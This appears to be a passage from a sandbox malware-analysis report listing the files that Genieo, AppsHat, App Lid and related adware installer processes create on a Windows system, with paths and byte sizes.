C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fr_topwords.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\apache-mime4j-0.6.jar (12088 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\fi_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\JGoogleAnalyticsTracker-1.2.1-SNAPSHOT.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\lucene-snowball-3.0.0.jar (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\isgenieoalive.dat (198 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories_multilingual.txt (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac.png (333 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\en_top_1000_draft.txt (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\signpost-core-1.2.1.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jdom.jar (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicit_content.dat (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon.png (723 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\en_lang.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D1.tmp (300445 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.exe (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\pt_stops_more.stop (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\explicitList.dat (491 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\pt_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\ru_lang.properties (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\sv_stops_stemmed.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\default.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\de_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedListByURL.dat (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqE2D2.tmp\NSISdl.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_25nouns_wiki.stop (169 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed3.stop (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fr_stops_stemmed2.stop (395 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\texts\origin\ru_lang.properties (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\genieutils.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\preset_feeds.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\cluto_wrapper.properties (942 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\json.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\httpclient-4.2.jar (14184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\no_topwords.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping.txt (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\fi_stops_stemmed.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\amazon_ad_api.jar (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_morestops.stop (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-api-1.0.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_general.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\fr_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_100_draft.txt (582 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_explicit.stop (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_ob.txt (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jericho-html-3.1.jar (6360 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_articlebase.txt (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo.l4j.ini (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_stops_stemmed2.stop (473 bytes)

The process InstallGenieo.exe:4052 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB000.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqAFFF.tmp (33533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\InstallGenieo.exe (18368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\genieo_setup.exe (16903 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Partner\uninstall\gim394750002\partner_uninstall.exe (1552 bytes)

The process InstallGenieo.exe:1660 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\readme.txt (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDOM_FAQ.htm (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Jericho HTML Parser.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDIC_Plus_index.html (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail_SMTP.txt (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JettyNOTICE.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe (18964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail API Reference Implementation — Project Kenai.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\License - jQuery JavaScript Library.htm (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\Elevate.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\iehv.chm (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\IeSearchProvider.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\OpenSorcePackagesInUse.txt (295 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\conf\conf.ini (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Launch4j - Cross-platform Java executable wrapper.htm (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\readme.txt (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\oauth-signpost - Project Hosting on Google Code.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\license.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\conf\conf.ini (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E4.tmp (32607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\reallysimplehistory - Project Hosting on Google Code.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\updater_uninstall.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\IE HistoryView Freeware Internet Explorer History Viewer.htm (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Apache log4j 1.2 - Project License.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozilaHistoryViewbrowsers.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\prepenv_setup.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\MozillaHistoryView.chm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\SQLite Copyright.htm (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Licenses.htm (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe (10430 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\LicenseAgreement.txt (784 bytes)

The process cscript.exe:3120 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\default_config.json (791 bytes)
C:\Users\"%CurrentUserName%"\Desktop\AppsHat.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\config.xml (819 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (65 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\Uninstall.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\AppsHat.lnk (2 bytes)

The process MsiExec.exe:3588 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Windows\Installer\MSI6613.tmp (520 bytes)
%Program Files% (x86)\MyPDFConverter\setup\Setup.exe (53 bytes)
C:\Windows\Installer\MSIFE02.tmp (520 bytes)

The process MsiExec.exe:1612 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI2648.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6B2B.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI605F.tmp (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6A40.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI373A.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FD2.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI485.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FB2.tmp (520 bytes)

The process genupdater.exe:3144 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\framework_setup.gen (1026190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\genieo_setup.gen (62942 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\trayapp_setup.gen (201149 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\partner_manifest.xml (550 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\Updater.log (11205 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\manifest.xml (644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\partner_manifest.xml (550 bytes)

The process Vlwgfsqfpaz.exe:3296 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\281.js (485 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\36.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils.dll (28539 bytes)
%Program Files% (x86)\App Lid\App Lid-bho.dll (4545 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\182.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\288.js (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\14.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\234.js (1 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe (8330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\78.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\nsisos.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\extension.js (354 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\46.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\253.js (737 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\64.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\38.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\180.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2BA3.tmp (718555 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\2.js (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\StdUtils.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\41.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\91.js (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\345.js (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\ExecDos.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils2.dll (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\207.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.dll (46278 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\183.js (2 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil64.dll (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\176142 (17985 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\354.js (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\37.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\301.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\252.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\22.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\150014 (243819 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil64.exe (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\223.js (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\45.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\21.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\4.js (3312 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.exe (7433 bytes)
%Program Files% (x86)\App Lid\background.html (729 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\ipgeoapi_com[1].json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\43.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\263.js (1 bytes)
%Program Files% (x86)\App Lid\utils.exe (90899 bytes)
%Program Files% (x86)\App Lid\App Lid-codedownloader.exe (8319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\17.js (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\242.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\177.js (784 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5_user.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\184.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\7.js (685 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01.xpi (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\28.js (536 bytes)
%Program Files% (x86)\App Lid\App Lid-bho64.dll (5873 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\13.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins.json (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\40.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\255.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\221.js (415 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\47.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\195.js (410 bytes)
%Program Files% (x86)\App Lid\Uninstall.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\background.js (636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\9.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\220.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\39.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\94.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\102.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\72.js (1552 bytes)
%Program Files% (x86)\App Lid\App Lid-bg.exe (4185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\262.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\42.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.dll (33295 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\3.js (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\44.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\35.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\1.js (10 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.job (77 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil.exe (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\manifest.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions\[email protected]\chrome\content\core\installer.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\104.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\246.js (8 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil.dll (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\manifest[1].xml (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\200.js (809 bytes)
%Program Files% (x86)\App Lid\App Lid.ico (9 bytes)

The process F365.tmp:3556 makes changes in the file system.
The Application creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18} (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (IA64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDB5.tmp (345 bytes)
